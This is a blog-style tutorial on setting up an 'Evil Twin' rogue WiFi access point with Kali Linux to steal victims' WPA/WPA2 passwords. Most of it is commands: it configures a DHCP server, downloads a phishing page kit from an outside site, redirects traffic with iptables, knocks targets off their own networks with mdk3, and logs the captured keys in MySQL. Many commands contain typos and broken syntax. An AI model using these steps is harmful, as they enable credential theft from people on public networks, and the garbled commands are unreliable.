fake access point

Evil Twin APs (i.e. Access Points) are rigged access points that pretend to be WiFi hotspots. When a person connects to an Evil Twin AP, his information will be exposed to the hacker.

To the victim, the malicious access point is a hotspot that has great signal. This perception results from the fact that the hacker is near the victim. People love strong WiFi networks,

so it’s likely that a victim will connect to an Evil Twin AP.

The Process

1. Access your Kali computer.

2. Make sure that you have internet connection.

3. Launch a terminal and enter

apt-get install dhcp3-server

This command will install a DHCP server onto your machine.

4. Type

nano/etc/dhcpd.conf

And press Enter. Your terminal will display an empty file.

5. Type the following commands:

authoritative

default-lease-time 600

max-lease-time 6000

subnet 192.168.1.128 netmask 255.255.255.128 {

option subnet-mask 255.255.255.128

option broadcast-address 192.168.1.255

option routers 192.168.1.129

option domain-name-servers 8.8.8.8

range 192.168.1.130 192.168.1.140

}

6. Once done, use the CTRL+X key combination and press “Y”.

7. Switch to another directory by typing:

cd /var/www

8. Then, issue the following commands:

rm index.html

wget http://hackthistv.com/eviltwin.zip

unzip eviltwin.zip

rm eviltwin.zip

9. Trigger MySQL and the Apache server by typing:

/etc/init.d/mysql start

/etc/init./apache2 start

10. You will use MySQL to generate a database for storing WPA/WPA2 passwords. Here are commands that you must issue:

Mysql –u root

create database evil_twin;

use evil_twin

create tale wpa_keys(passwors varchar(64), confirm varchar(64));

11. Type “ip route” to determine your local IP address.

12. Identify the name of your network adapter using this command:

airmon-ng start wlan0

13. Update the OUI (Organizationally Unique Identifier) of your Airodump-ng program. Here’s the command:

airodump-ng-oui-update

14. Find the ESSID (Extended Service Set Identification), BSSID (the MAC address of your access point), and the channel that you need to use. The command that you should use is:

airodump-ng –M mon0

15. Activate the Evil Twin AP using this syntax:

airbase-ng –e [insert ESSID here] –c [insert channel number here] –P mon0

16. The Airbase-ng program created a tunnel interface on your behalf. You just have to configure this tunnel interface to connect your wired interface and your “evil” access point. To do this, you must launch a terminal and type the following:

ifconfig [name of tunnel interface] 192.168.1.129 netmask 255.255.255.128

17. Enable internet protocol forwarding through these commands:

route add –net 192.168.1.128 netmask 255.255.255.128 gw 192.186.1.129

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables –table net –append POSTROUTING –out-interface

[name of local interface]

–j

MASKQUERADE

iptables –append FORWARD –in-interface [name of tunnel interface] –j ACCEPT

iptables –t net –A PREROUTING –p tcp –dport 80 –j DNET –to-destination [LOCALIP

ADDRESS:80]

iptables –t net –A POSTROUTING –j MASQUERADE

dhcpd –cf /etc./dhcpd.conf –pf /var/run/dhcpd.pid [name of tunnel interface]

etc./init.d/isc-dhcp-server start

18. Disconnect your targets from their current wireless networks. To accomplish this, you must generate a “blacklist” file to hold the target’s BSSID. Issue the following commands:

echo [BSSID] > blacklist

mdk3 mon0 d –b blacklist –c [CH.#]

19. Look at the terminal that holds your Airbase-ng program. See if a target connected to your access point. When a person tries to connect, he will see a security page that asks for the WPA/WPA2 key.

20. Check the terminal for your MySQL database and enter the following:

use evil_twin

21. Access “wpa_keys” to view the data entered by your target.

LEAVE A REPLY

Please enter your comment!
Please enter your name here